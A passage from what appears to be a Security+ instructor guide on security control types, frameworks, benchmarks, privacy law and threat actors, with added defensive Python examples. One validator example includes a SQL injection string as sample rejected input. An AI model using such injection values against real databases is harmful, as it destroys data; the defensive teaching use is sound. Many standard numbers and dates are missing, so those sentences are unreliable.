• Physical—Controls such as alarms, gateways, locks, lighting, security cameras, and guards that deter and detect access to premises and hardware are often classed separately.
• Deterrent—The control may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. This could include signs and warnings of legal penalties against trespass or intrusion.
• Compensating—The control serves as a substitute for a principal control, as recommended by a security standard, and affords the same or better level of protection but uses a different methodology or technology.

Functional types of security controls. (Images © 123RF.com.)

Teaching Tip
Where the category describes the implementation type, a functional type describes what the control is deployed to do.

Interaction Opportunity
Get the students to nominate examples of different types of controls:
• Preventive: permissions policy, encryption, firewall, barriers, locks
• Detective: alarms, monitoring, file verification
• Corrective: incident response policies, data backup, patch management
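To make the category/function distinction concrete, here is an added example (not code from the course) that applies a control of each functional type to one file access path: an ACL check (technical by category, preventive by function), an audit log that is reviewed for repeated denials (detective), and a hash-compared restore from backup (corrective). The ACL contents, user names, file names, and log line format are all constructed for illustration.

```python
"""Added example (not from the course): one request path with a control of each
functional type applied to it. Names, users, the ACL, and log lines are constructed.

  preventive  -> the ACL check runs before access is granted
  detective   -> every decision is written to an audit log that is reviewed later
  corrective  -> a tampered file is restored from backup after the damage is found
"""
import hashlib
from collections import Counter
from dataclasses import dataclass, field

# Constructed ACL: resource -> set of (user, permission) pairs that are granted.
ACL = {
    "payroll.xlsx": {("alice", "read"), ("alice", "write"), ("bob", "read")},
    "roadmap.docx": {("carol", "read")},
}


@dataclass
class Store:
    """Toy file store with a backup copy per file and an append-only audit log."""
    files: dict = field(default_factory=dict)
    backups: dict = field(default_factory=dict)
    audit_log: list = field(default_factory=list)


def is_permitted(user, resource, permission):
    """Preventive (technical) control: deny unless the ACL explicitly grants it."""
    return (user, permission) in ACL.get(resource, set())


def access(store, user, resource, permission):
    """Apply the preventive check and record the decision (detective control)."""
    allowed = is_permitted(user, resource, permission)
    outcome = "ALLOW" if allowed else "DENY"
    store.audit_log.append(
        f"user={user} resource={resource} perm={permission} result={outcome}"
    )
    return allowed


def find_repeated_denials(log, threshold=3):
    """Detective control: review the log for users denied at least `threshold` times."""
    denials = Counter()
    for line in log:
        fields = dict(kv.split("=", 1) for kv in line.split())
        if fields.get("result") == "DENY":
            denials[fields["user"]] += 1
    return {user: n for user, n in denials.items() if n >= threshold}


def restore_if_tampered(store, resource):
    """Corrective control: if the live copy no longer matches its backup, restore it."""
    live = hashlib.sha256(store.files[resource]).hexdigest()
    known_good = hashlib.sha256(store.backups[resource]).hexdigest()
    if live == known_good:
        return False
    store.files[resource] = store.backups[resource]
    return True


if __name__ == "__main__":
    store = Store(files={"payroll.xlsx": b"salary data"},
                  backups={"payroll.xlsx": b"salary data"})
    access(store, "alice", "payroll.xlsx", "write")       # allowed
    for _ in range(3):
        access(store, "mallory", "payroll.xlsx", "read")  # denied each time
    print(find_repeated_denials(store.audit_log))         # {'mallory': 3}
    store.files["payroll.xlsx"] = b"altered by attacker"  # constructed tampering
    print(restore_if_tampered(store, "payroll.xlsx"))     # True
```

Note where each control sits relative to the attack: `is_permitted` runs before the access happens, `find_repeated_denials` only sees an attempt once the log has recorded it, and `restore_if_tampered` undoes damage after the fact. The same ACL is a technical control by category and a preventive control by function, which is exactly the two-axis classification the topic describes.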

Show Slide(s): NIST Cybersecurity Framework

NIST Cybersecurity Framework
A cybersecurity framework (CSF) is a list of activities and objectives undertaken to mitigate risks. The use of a framework allows an organization to make an objective statement of its current cybersecurity capabilities, identify a target level of capability, and prioritize investments to achieve that target. This is valuable for giving a structure to internal risk management procedures and provides an externally verifiable statement of regulatory compliance. Frameworks are also important because they save an organization from building its security program in a vacuum, or from building the program on a foundation that fails to account for important security concepts.

There are many different frameworks, each of which categorizes cybersecurity activities and controls in slightly different ways. These frameworks are non-regulatory in the sense that they do not attempt to address the specific regulations of a specific industry but represent best practice in IT security governance generally. Most organizations will have historically chosen a particular framework; some may use multiple frameworks in conjunction.

Most frameworks are developed for an international audience; others are focused on a domestic national audience. Most of the frameworks are associated with certification programs to show that staff and consultants can apply the methodologies successfully.
The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) is a relatively new addition to the IT governance space and distinct from other frameworks by focusing exclusively on IT security, rather than IT service provision more generally (nist.gov/cyberframework). It is developed for a US audience and focuses somewhat on government, but its recommendations can be adapted for other countries and types of organizations.

NIST's Risk Management Framework (RMF) pre-dates the CSF. Where the CSF focuses on practical cybersecurity for businesses, the RMF is more prescriptive and principally intended for use by federal agencies (csrc.nist.gov/projects/risk-management/rmf-overview).
As well as its cybersecurity and risk frameworks, NIST is responsible for issuing the Federal Information Processing Standards (FIPS) plus advisory guides called Special Publications (csrc.nist.gov/publications/sp). Many of the standards and technologies covered in CompTIA Security+ are discussed in these documents.

Teaching Tip
Businesses might be framework-oriented or they might need to use a framework because of a legal or regulatory requirement.
Note that we have already looked at the five functions of the CSF. Risk management is covered later in the course.

Show Slide(s): ISO and Cloud Frameworks

ISO and Cloud Frameworks

International Organization for Standardization (ISO)
The International Organization for Standardization (ISO) has produced a cybersecurity framework in conjunction with the International Electrotechnical Commission (IEC). The framework was established in and revised in . Unlike the NIST framework, the ISO Information Security Management standard must be purchased (iso.org/standard/ .html). ISO is part of an overall series of information security standards, also known as . Of these, classifies security controls, and reference cloud security, and focuses on personal data and privacy.

Teaching Tip
There is a lot of detail to take in here. Try not to spend too long in class, but students will need to be able to match the organizations and frameworks to typical industries and uses.

ISO
Where ISO is a cybersecurity framework, ISO (iso.org/iso- -risk-management.html) is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial, customer service, competition, and legal liability factors. ISO establishes best practices for performing risk assessments.

Cloud Security Alliance
The not-for-profit organization Cloud Security Alliance (CSA) produces various resources to assist cloud service providers (CSP) in setting up and delivering secure cloud platforms. These resources can also be useful for cloud consumers in evaluating and selecting cloud services.
• Security Guidance (cloudsecurityalliance.org/research/guidance): a best practice summary analyzing the unique challenges of cloud environments and how on-premises controls can be adapted to them.
• Enterprise reference architecture (ea.cloudsecurityalliance.org): best practice methodology and tools for CSPs to use in architecting cloud solutions. The solutions are divided across a number of domains, such as risk management and infrastructure, application, and presentation services.
• Cloud controls matrix (cloudsecurityalliance.org/research/working-groups/cloud-controls-matrix): lists specific controls and assessment guidelines that should be implemented by CSPs. For cloud consumers, the matrix acts as a starting point for cloud contracts and agreements as it provides a baseline level of security competency that the CSP should meet.

Statements on Standards for Attestation Engagements (SSAE) Service Organization Control (SOC)
The Statements on Standards for Attestation Engagements (SSAE) are audit specifications developed by the American Institute of Certified Public Accountants (AICPA). These audits are designed to assure consumers that service providers (notably cloud providers, but including any type of hosted or third-party service) meet professional standards (aicpa.org/interestareas/frc/assuranceadvisoryservices/serviceorganization-smanagement.html). Within SSAE No. (the current specification), there are several levels of reporting:
• Service Organization Control (SOC ) evaluates the internal controls implemented by the service provider to ensure compliance with Trust Services Criteria (TSC) when storing and processing customer data. TSC refers to security, confidentiality, integrity, availability, and privacy properties. An SOC Type I report assesses the system design, while a Type II report assesses the ongoing effectiveness of the security architecture over a period of months. SOC reports are highly detailed and designed to be restricted. They should only be shared with the auditor and regulators and with important partners under non-disclosure agreement (NDA) terms.
• SOC : a less detailed report certifying compliance with SOC . SOC reports can be freely distributed.

Show Slide(s): Benchmarks and Secure Configuration Guides

Benchmarks and Secure Configuration Guides
Although a framework gives a high-level view of how to plan IT services, it does not generally provide detailed implementation guidance. At a system level, the deployment of servers and applications is covered by benchmarks and secure configuration guides.

Teaching Tip
Explain the difference between a framework and benchmark. Note the use of benchmarks for both host/network appliance deployment (operations) and coding projects (development).

Center for Internet Security (CIS)
The Center for Internet Security (cisecurity.org) is a not-for-profit organization (founded partly by The SANS Institute). It publishes the well-known CIS Controls. The CIS-RAM (Risk Assessment Method) can be used to perform an overall evaluation of security posture (learn.cisecurity.org/cis-ram).

CIS also produces benchmarks for different aspects of cybersecurity. For example, there are benchmarks for compliance with IT frameworks and compliance programs, such as CIS, NIST, , , and ISO. There are also product-focused benchmarks, such as for Windows Desktop, Windows Server, macOS, Linux, Cisco, web browsers, web servers, database and email servers, and VMware ESXi. The CIS-CAT (Configuration Access Tool) can be used with automated vulnerability scanners to test compliance against these benchmarks (cisecurity.org/cybersecurity-tools/cis-cat-pro/cis-cat-faq).

Network Appliance/Platform/Vendor-specific Guides
Operating system best practice configuration lists the settings and controls that should be applied for a computing platform to work in a defined role, such as client workstation, authentication server, network switch/router/firewall, web/application server, and so on.
Most vendors will provide guides, templates, and tools for configuring and validating the deployment of network appliances, operating systems, web servers, and application/database servers. The security configurations for each of these devices will vary not only by vendor but by device and version as well. The vendor's support portal will host the configuration guides along with setup/install guides and software downloads and updates, or they can be easily located using a web search engine.
There is also detailed guidance available from several organizations to cover both vendor-neutral deployments and to provide third-party assessment and advice on deploying vendor products. Apart from the CIS controls, some notable sources include:
• Department of Defense Cyber Exchange provides Security Technical Implementation Guides (STIGs) with hardening guidelines for a variety of software and hardware solutions (public.cyber.mil).
• National Checklist Program (NCP) by NIST provides checklists and benchmarks for a variety of operating systems and applications (nvd.nist.gov/ncp/repository).
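A benchmark is only useful to a scanner once each recommendation has been expressed as a check against an observed setting. The following is an added example written for this guide, not taken from CIS, CIS-CAT or any published benchmark: a small checker that parses a key/value service configuration (the format is modelled on sshd_config-style syntax, which is an assumption), compares four constructed benchmark items against it, and scores a deliberately loose configuration beside a hardened one. The setting names, expected values, rationales, and both sample files are constructed.

```python
"""Added example (not CIS-CAT, not real benchmark content): a minimal checker that
turns a benchmark into machine-readable checks and scores a host configuration.

The benchmark entries, the two sample configurations, and the 'Key value' file
format (modelled on sshd_config-style syntax) are all constructed for illustration.
"""
import re

# Constructed benchmark: setting -> (comparison, expected value, rationale).
BENCHMARK = {
    "PermitRootLogin": ("eq", "no", "direct root logins remove accountability"),
    "PasswordAuthentication": ("eq", "no", "prefer key-based authentication"),
    "MaxAuthTries": ("le", 4, "limit guesses per connection"),
    "LogLevel": ("in", {"INFO", "VERBOSE"}, "events must be logged for detection"),
}


def parse_config(text):
    """Parse 'Key value' lines; '#' starts a comment; a later key overrides an earlier one."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        match = re.match(r"(\S+)\s+(.+)", line)
        if match:
            settings[match.group(1)] = match.group(2).strip()
    return settings


def evaluate(settings):
    """Return {setting: (passed, actual_value)}.

    A setting that is absent from the file fails: this checker deliberately does
    not assume a safe default, because the default often depends on the version.
    """
    results = {}
    for key, (op, expected, _why) in BENCHMARK.items():
        actual = settings.get(key)
        if actual is None:
            results[key] = (False, None)
            continue
        if op == "eq":
            passed = actual.lower() == expected
        elif op == "le":
            passed = actual.isdigit() and int(actual) <= expected
        else:  # "in"
            passed = actual.upper() in expected
        results[key] = (passed, actual)
    return results


def score(results):
    """Return (passed, total) so a scanner can report e.g. 'scored 4/4'."""
    return sum(1 for passed, _ in results.values() if passed), len(results)


# Constructed sample configurations: a loose default and a hardened one.
WEAK_CONFIG = """
# service left close to its defaults (constructed sample)
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
"""

HARDENED_CONFIG = """
PermitRootLogin no
PasswordAuthentication no   # keys only
MaxAuthTries 3
LogLevel VERBOSE
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = evaluate(parse_config(cfg))
        passed, total = score(results)
        print(f"{name}: {passed}/{total}")
        for key, (ok, actual) in results.items():
            print(f"  {'PASS' if ok else 'FAIL'} {key}={actual!r} ({BENCHMARK[key][2]})")
```

Two design points carry over to real benchmark tooling: each check records the actual value alongside pass/fail, so the report is evidence rather than a bare score, and a missing setting is treated as a failure rather than silently assumed to be at a safe default.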

Application er ers
Most application architectures use a client-server model. This means that part of the
application is a client software program, installed and run on separate hardware from
the server application code. The client interacts with the server over a network. Attacks
can therefore be directed at the local client code, at the server application, or at the
network channel between them. As well as coding issues, the applications need to take
account of platform issues. The client application might be running in a computing host
alongside other, potentially malicious, software. Code that runs on the client should
not be trusted. The server-side code should implement routines to verify that input
conforms to what is expected.
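The server-side verification the paragraph calls for, as an added example in Python (not code from the CompTIA guide): the request format, field names, and limits are constructed assumptions, and the handler shows that a client-supplied "validated" flag or an extra field is simply discarded rather than trusted.

```python
"""Server-side input validation for a client/server application.

Added example (not from the CompTIA guide): the server re-validates every
field a client sends, because any client-side check runs on an untrusted
host. The request format, field names, and limits below are constructed.
"""
import re
from typing import Any

# Constructed validation rules for a hypothetical "create order" request.
ALLOWED_CURRENCIES = {"USD", "EUR", "GBP"}
SKU_PATTERN = re.compile(r"^[A-Z]{3}-\d{4}$")   # e.g. ABC-1234
MAX_QUANTITY = 100
MAX_NOTE_LENGTH = 200


class ValidationError(ValueError):
    """Raised when a request does not conform to what the server expects."""


def validate_order(request: dict[str, Any]) -> dict[str, Any]:
    """Return a cleaned order built only from fields the server recognizes.

    Anything the client claims about itself (such as a "validated" flag) and
    any field the server did not ask for is ignored; every accepted value is
    type- and range-checked here, on the server, regardless of client checks.
    """
    if not isinstance(request, dict):
        raise ValidationError("request body must be a JSON object")

    sku = request.get("sku")
    if not isinstance(sku, str) or not SKU_PATTERN.fullmatch(sku):
        raise ValidationError("sku must match AAA-9999")

    quantity = request.get("quantity")
    # bool is a subclass of int in Python, so reject it explicitly.
    if isinstance(quantity, bool) or not isinstance(quantity, int):
        raise ValidationError("quantity must be an integer")
    if not 1 <= quantity <= MAX_QUANTITY:
        raise ValidationError(f"quantity must be between 1 and {MAX_QUANTITY}")

    currency = request.get("currency")
    if currency not in ALLOWED_CURRENCIES:
        raise ValidationError("currency not supported")

    note = request.get("note", "")
    if not isinstance(note, str) or len(note) > MAX_NOTE_LENGTH:
        raise ValidationError(f"note must be a string of at most {MAX_NOTE_LENGTH} chars")
    # Drop control characters so the note cannot smuggle line or record separators
    # into logs or downstream records.
    note = "".join(ch for ch in note if ch.isprintable())

    # Allowlist construction: unknown keys such as "price_override" never reach
    # the application logic.
    return {"sku": sku, "quantity": quantity, "currency": currency, "note": note}


def handle_request(request: Any) -> tuple[int, dict[str, Any]]:
    """Simulated server endpoint: returns (HTTP status, response body)."""
    try:
        order = validate_order(request)
    except ValidationError as err:
        return 400, {"error": str(err)}
    return 200, {"accepted": order}


if __name__ == "__main__":
    # Constructed sample requests, as a client (or a tampered client) might send.
    good = {"sku": "ABC-1234", "quantity": 2, "currency": "USD", "note": "gift"}
    tampered = {"sku": "ABC-1234", "quantity": 2, "currency": "USD",
                "price_override": 0.01, "validated": True}
    bad = {"sku": "'; DROP TABLE orders; --", "quantity": "2", "currency": "USD"}
    for req in (good, tampered, bad):
        print(handle_request(req))
```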

Web Server Applications
A web application is a particular type of client-server architecture. A web application
leverages existing technologies to simplify development. The application uses a generic
client (a web browser), and standard network protocols and servers (HTTP/HTTPS). The
specific features of the application are developed using code running on the clients
and servers. Web applications are also likely to use a multi-tier architecture, where the
server part is split between application logic and data storage and retrieval. Modern
web applications may use even more distributed architectures, such as microservices
and serverless.

The Open Web Application Security Project (OWASP) is a not-for-profit, online
community that publishes several secure application development resources, such as
the Top 10 list of the most critical application security risks (owasp.org/www-project-top-ten).
OWASP has also developed resources, such as the Zed Attack Proxy and Juice
Shop (a deliberately unsecure web application), to help investigate and understand
penetration testing and application security issues.

Regulations, Standards, and Legislation

The key frameworks, benchmarks, and configuration guides may be used to
demonstrate compliance with a country's legal/regulatory requirements or with
industry-specific regulations. Due diligence is a legal term meaning that responsible
persons have not been negligent in discharging their duties. Negligence may create
criminal and civil liabilities. Many countries have enacted legislation that criminalizes
negligence in information management. In the US, for example, the Sarbanes-Oxley
Act mandates the implementation of risk assessments, internal controls, and
audit procedures. The Computer Security Act requires federal agencies to
develop security policies for computer systems that process confidential information.
In 2002, the Federal Information Security Management Act (FISMA) was introduced to
govern the security of data processed by federal government agencies.

Some regulations have specific cybersecurity control requirements; others simply mandate
best practice, as represented by a particular industry or international framework. It may
be necessary to perform mapping between different industry frameworks, such as NIST
and ISO, if a regulator specifies the use of one but not another. Conversely, the use of
frameworks may not be mandated as such, but auditors are likely to expect them to be in
place as a demonstration of a strong and competent security program.

Show Slide(s): Regulations, Standards, and Legislation

Teaching Tip: The syllabus does not list specific examples of legislation, so these
are illustrative rather than comprehensive. Students should focus on the fact that there
can be many different sources of compliance requirements. Note the difference
between vertical (sector-specific) and horizontal (consumer-specific, cross-sector)
legislation.

Personal Data and the General Data Protection Regulation

Where some types of legislation address cybersecurity due diligence, others focus in
whole or in part on information security as it affects privacy or personal data. Privacy
is a distinct concept from security. Privacy requires that collection and processing
of personal information be both secure and fair. Fairness and the right to privacy,
as enacted by regulations such as the European Union's General Data Protection
Regulation (GDPR), means that personal data cannot be collected, processed, or
retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose
must be clearly described to the user in plain language, not legalese. GDPR (ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr)
gives data subjects rights to withdraw consent, and to inspect, amend,
or erase data held about them.

National, Territory, or State Laws


Compliance issues are complicated by the fact that laws derive from different sources.
For example, the GDPR does not apply to American data subjects, but it does apply
to American companies that collect or process the personal data of people in EU
countries. In the US, there are national federal laws, state laws, plus a body of law
applying to US territories (Puerto Rico, the US Virgin Islands, Guam, and American
Samoa). Federal laws tend to focus either on regulations like FISMA for federal
departments or as vertical laws affecting a particular industry. Examples of the latter
include the Gramm-Leach-Bliley Act (GLBA) for financial services, and the Health
Insurance Portability and Accountability Act (HIPAA).

Some states have started to introduce horizontal personal data regulations, similar
to the approach taken by the GDPR. One high-profile example of state legislation is
the California Consumer Privacy Act (CCPA) (csoonline.com/article/…/california-consumer-privacy-act-what-you-need-to-know-to-be-compliant.html).

Varonis' blog contains a useful overview of privacy laws in the US (varonis.com/blog/us-privacy-laws).

Payment Card Industry Data Security Standard (PCI DSS)


Compliance issues can also arise from industry-mandated regulations. For example,
the Payment Card Industry Data Security Standard (PCI DSS) defines the safe handling
and storage of financial information (pcisecuritystandards.org/pci_security).


Review Activity:
Security Control and Framework Types
Answer the following questions:

1. You have implemented a secure web gateway that blocks access to a social
networking site. How would you categorize this type of security control?

It is a technical type of control (implemented in software) and acts as a preventive
measure.

2. A company has installed motion-activated floodlighting on the grounds
around its premises. What class and function is this security control?

It would be classed as a physical control and its function is both detecting and
deterring.

3. A firewall appliance intercepts a packet that violates policy. It automatically
updates its Access Control List to block all further packets from the source
IP. What TWO functions is the security control performing?

Preventive and corrective.

4. If a security control is described as operational and compensating, what can
you determine about its nature and function?

That the control is enforced by a person rather than a technical system, and that
the control has been developed to replicate the functionality of a primary control, as
required by a security standard.

5. If a company wants to ensure it is following best practice in choosing
security controls, what type of resource would provide guidance?

A cybersecurity framework and/or benchmark and secure configuration guides.


Lesson 1
Summary
You should be able to compare and contrast security controls using categories and
functional types. You should also be able to explain how regulations, frameworks, and
benchmarks are used to develop and validate security policies and control selection.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions about.
If you have used all the available time for this lesson block, note the issues, and
schedule time for a review later in the course.

Guidelines for Comparing Security Roles and Security Controls

Follow these guidelines when you assess the use of security controls, frameworks, and
benchmarks in your organization:

• Create a security mission statement and supporting policies that emphasize the
importance of the CIA triad (confidentiality, integrity, availability).

• Assign roles so that security tasks and responsibilities are clearly understood and
that impacts to security are assessed and mitigated across the organization.

• Consider creating business units, departments, or projects to support the security
function, such as a SOC, CSIRT, and DevSecOps.

• Identify and assess the laws and industry regulations that impose compliance
requirements on your business.

• Select a framework that meets compliance requirements and business needs.

• Create a matrix of security controls that are currently in place to identify categories
and functions—consider deploying additional controls for any unmatched
capabilities.

• Use benchmarks, secure configuration guides, and development best practices as
baselines for deploying assets.

• Evaluate security capabilities against framework tiers and identify goals for
developing additional cybersecurity competencies and improving overall
information security assurance.

Interaction Opportunity: Optionally, discuss with students how the concepts from
this lesson could be used within their own workplaces, or how these principles are
already being put into practice.

Lesson 2
Explaining Threat Actors and
Threat Intelligence

LESSON INTRODUCTION

To make an effective security assessment, you must be able to explain strategies
for both defense and attack. Your responsibilities are likely to lie principally in
defending assets, but to do this you must be able to explain the tactics, techniques,
and procedures of threat actors. You must also be able to differentiate the types and
capabilities of threat actors. As the threat landscape is continually evolving, you must
also be able to identify reliable sources of threat intelligence and research.

Teaching Tip: The first few lessons in the course pursue the general theme of
assessment. This lesson covers threat awareness and research. As with most areas
of IT, it is vital to keep up to date with the latest news and trends in cybersecurity.

Lesson Objectives

In this lesson, you will:

• Explain threat actor types and attack vectors.

• Explain threat intelligence sources.


Topic 2A
Explain Threat Actor Types and
Attack Vectors

EXAM OBJECTIVES COVERED

1.5 Explain different threat actors, vectors, and intelligence sources

Classifying and evaluating the capabilities of threat actor types enables you to assess
and mitigate risks more effectively. Understanding the methods by which threat actors
infiltrate networks and systems is essential for you to assess the attack surface of your
networks and deploy controls to block attack vectors.

Teaching Tip: Objective 1.5 is covered here and in Topic 2B. Students must be
able to distinguish vulnerability, threat, and risk, and categorize threat actor
types for the exam.
Vulnerability, Threat, and Risk

As part of security assessment and monitoring, security teams must identify ways
in which their systems could be attacked. These assessments involve vulnerabilities,
threats, and risk:

• Vulnerability is a weakness that could be triggered accidentally or exploited
intentionally to cause a security breach. Examples of vulnerabilities include
improperly configured or installed hardware or software, delays in applying and
testing software and firmware patches, untested software and firmware patches,
the misuse of software or communication protocols, poorly designed network
architecture, inadequate physical security, insecure password usage, and design
flaws in software or operating systems, such as unchecked user input.

• Threat is the potential for someone or something to exploit a vulnerability and
breach security. A threat may be intentional or unintentional. The person or thing
that poses the threat is called a threat actor or threat agent. The path or tool used by
a malicious threat actor can be referred to as the attack vector.

• Risk is the likelihood and impact (or consequence) of a threat actor exploiting
a vulnerability. To assess risk, you identify a vulnerability and then evaluate the
likelihood of it being exploited by a threat and the impact that a successful exploit
would have.

Relationship between vulnerability, threat, and risk.

Show Slide(s): Vulnerability, Threat, and Risk

Teaching Tip: Make sure students can distinguish these terms and understand
how assessment of vulnerability and threat facilitates calculation of risk.


These definitions and more information on risk management are contained in NIST's SP
800-30 (nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf).

Attributes of Threat Actors

Historically, cybersecurity techniques were highly dependent on the identification
of static known threats, such as viruses or rootkits, Trojans, botnets, and specific
software vulnerabilities. It is relatively straightforward to identify and scan for these
types of threats with automated software. Unfortunately, adversaries were able to
develop means of circumventing this type of signature-based scanning.

The sophisticated nature of modern cybersecurity threats means that it is important
to be able to describe and analyze behaviors. This analysis involves identifying the
attributes of threat actors in terms of location, intent, and capability.

Show Slide(s): Attributes of Threat Actors

Teaching Tip: Note that the detailed process of analyzing the threat posed by
a particular actor or adversary group is described as threat modeling. Discuss
how threat sources and motivations change over time. For example, Internet
threats have changed from being mostly opportunistic vandalism to structured
threats associated with organized crime and state-backed groups.

Internal/External

An external threat actor or agent is one that has no account or authorized access
to the target system. A malicious external threat must infiltrate the security system
using malware and/or social engineering. Note that an external actor may perpetrate
an attack remotely or on-premises (by breaking into the company's headquarters,
for instance). It is the threat actor that is defined as external, rather than the
attack method.

Conversely, an internal (or insider) threat actor is one that has been granted
permissions on the system. This typically means an employee, but insider threat can
also arise from contractors and business partners.

Intent/Motivation

Intent describes what an attacker hopes to achieve from the attack, while motivation
is the attacker's reason for perpetrating the attack. A malicious threat actor could
be motivated by greed, curiosity, or some sort of grievance, for instance. The intent
could be to vandalize and disrupt a system or to steal something. Threats can be
characterized as structured or unstructured (or targeted versus opportunistic)
depending on the degree to which your own organization is targeted specifically. For
example, a criminal gang attempting to steal customers' financial data is a structured,
targeted threat; a script kiddie launching some variant on the "I Love You" email worm
is an unstructured, opportunistic threat.

Malicious intents and motivations can be contrasted with accidental or unintentional
threat actors and agents. Unintentional threat actors represent accidents, oversights,
and other mistakes.

Level of Sophistication/Capability and Resources/Funding

You must also consider the sophistication and level of resources/funding that different
adversaries might possess. Capability refers to a threat actor's ability to craft novel
exploit techniques and tools. The least capable threat actor relies on commodity
attack tools that are widely available on the web or dark web. More capable actors can
fashion zero-day exploits in operating systems, applications software, and embedded
control systems. At the highest level, a threat actor might make use of non-cyber tools,
such as political or military assets. Capability is only funded through a substantial
budget. Sophisticated threat actor groups need to be able to acquire resources, such
as customized attack tools and skilled strategists, designers, coders, hackers, and social
engineers. The most capable threat actor groups receive funding from nation states
and criminal syndicates.


Hackers, Script Kiddies, and Hacktivists

To fully assess intent and capability, it is helpful to identify different categories of
threat actors.

Show Slide(s): Hackers, Script Kiddies, and Hacktivists

Interaction Opportunity: Get students to relate each of these types to
intent/motivation and capability. Terminology such as black/white hat is
non-inclusive and is being replaced by neutral terms (non-authorized/authorized).

Hackers

Hacker describes an individual who has the skills to gain access to computer systems
through unauthorized or unapproved means. Originally, hacker was a neutral term for
a user who excelled at computer programming and computer system administration.
Hacking into a system was a sign of technical skill and creativity that gradually
became associated with illegal or malicious system intrusions. The terms black hat
(unauthorized) and white hat (authorized) are used to distinguish these motivations.
Of course, between black and white lie some shades of gray. A gray hat hacker (semi-
authorized) might try to find vulnerabilities in a product or network without seeking the
approval of the owner, but they might not try to exploit any vulnerabilities they find. A
gray hat might seek voluntary compensation of some sort (a bug bounty), but will not
use an exploit as extortion. A white hat hacker always seeks authorization to perform
penetration testing of private and proprietary systems.

Script Kiddies

A script kiddie is someone who uses hacker tools without necessarily understanding
how they work or having the ability to craft new attacks. Script kiddie attacks might
have no specific target or any reasonable goal other than gaining attention or proving
technical abilities.

Hacker Teams and Hacktivists

The historical image of a hacker is that of a loner, acting as an individual with few
resources or funding. While any such lone hacker remains a threat that must be
accounted for, threat actors are now likely to work as part of some sort of team or
group. The collaborative team effort means that these types of threat actors are able to
develop sophisticated tools and novel strategies.

A hacktivist group, such as Anonymous, WikiLeaks, or LulzSec, uses cyber weapons
to promote a political agenda. Hacktivists might attempt to obtain and release
confidential information to the public domain, perform denial of service (DoS) attacks,
or deface websites. Political, media, and financial groups and companies are probably
most at risk, but environmental and animal advocacy groups may target companies in
a wide range of industries.

State Actors and Advanced Persistent Threats

Show Slide(s): State Actors and Advanced Persistent Threats

Teaching Tip: Get students to relate this type to intent/motivation and capability.
The Sony hack (www.slate.com/articles/technology/users/…/sony_employees_on_the_hack_one_year_later.html)
and WannaCry (wired.com/…/wannacry-ransomware-hackers-made-real-amateur-mistakes),
both blamed on North Korea, are good examples of state-sponsored attacks.
China's Great Cannon (computerworld.com/article/…/the-great-cannon-of-china-enforces-internet-censorship.html)
is a good example of how nation states can deploy significant cybersecurity
resources to achieve their aims.

Most nation states have developed cybersecurity expertise and will use cyber weapons
to achieve both military and commercial goals. The security company Mandiant's APT1
report into Chinese cyber espionage units (fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf)
was hugely influential in shaping the language
and understanding of modern cyber attack life cycles. The term Advanced Persistent
Threat (APT) was coined to understand the behavior underpinning modern types of
cyber adversaries. Rather than think in terms of systems being infected with a virus or
Trojan, an APT refers to the ongoing ability of an adversary to compromise network
security (to obtain and maintain access) using a variety of tools and techniques.

State actors have been implicated in many attacks, particularly on energy and health
network systems. The goals of state actors are primarily espionage and strategic
advantage, but it is not unknown for countries (North Korea being a good example)
to target companies purely for commercial gain.


Researchers such as FireEye report on the activities of organized crime and nation state actors.
(Screenshot used with permission from fireeye.com.)

State actors will work at arm's length from the national government, military, or
security service that sponsors and protects them, maintaining plausible deniability.
They are likely to pose as independent groups or even as hacktivists. They may wage
false flag campaigns that try to implicate other states (media.kasperskycontenthub.com/wp-content/uploads/sites/…/APT_predictions_…_web.pdf).

Criminal Syndicates and Competitors

Show Slide(s): Criminal Syndicates and Competitors

Teaching Tip: SIM swap fraud is a good illustration of organized crime-type
activity (digitaltrends.com/mobile/sim-swap-fraud-explained). The Garmin
ransomware incident illustrates the blurred lines between criminal syndicates,
state groups, and intent/motivation
(zdnet.com/article/hacker-gang-behind-garmin-attack-doesnt-have-a-history-of-stealing-user-data).

In many countries, cybercrime has overtaken physical crime both in terms of number
of incidents and losses. A criminal syndicate can operate across the Internet from
different jurisdictions than its victim, increasing the complexity of prosecution.
Syndicates will seek any opportunity for criminal profit, but typical activities are
financial fraud (both against individuals and companies) and extortion.

Most competitor-driven espionage is thought to be pursued by state actors, but it is not
inconceivable that a rogue business might use cyber espionage against its competitors.
Such attacks could aim at theft or at disrupting a competitor's business or damaging
their reputation. Competitor attacks might be facilitated by employees who have
recently changed companies and bring an element of insider knowledge with them.

Insider Threat Actors

Show Slide(s): Insider Threat Actors

Teaching Tip: The Capital One
(scmagazine.com/home/security-news/capital-one-breach-exposes-not-just-data-but-dangers-of-cloud-misconfigurations)
and Twitter (vice.com/en_us/article/…/twitter-insider-access-panel-account-hacks-biden-uber-bezos)
breaches are good examples of insider threat.

Many threat actors operate externally from the networks they target. An external actor
has to break into the system without having been granted any legitimate permissions.
An insider threat arises from an actor who has been identified by the organization and
granted some sort of access. Within this group of internal threats, you can distinguish
insiders with permanent privileges, such as employees, from insiders with temporary
privileges, such as contractors and guests. The Computer Emergency Response Team
(CERT) at Carnegie Mellon University's definition of a malicious insider is:


A current or former employee, contractor, or business partner who has or had
authorized access to an organization's network, system, or data and intentionally
exceeded or misused that access in a manner that negatively affected the confidentiality,
integrity, or availability of the organization's information or information systems.
(insights.sei.cmu.edu/insider-threat/…/cert-definition-of-insider-threat-updated.html)

There is the blurred case of former insiders, such as ex-employees now working at another
company or who have been dismissed and now harbor a grievance. These can be classified
as internal threats or treated as external threats with insider knowledge, and possibly some
residual permissions, if effective offboarding controls are not in place.

CERT identifies the main motivators for malicious insider threats as sabotage,
financial gain, and business advantage. Like external threats, insider threats can be
opportunistic or targeted. Again, the key point here is to identify likely motivations,
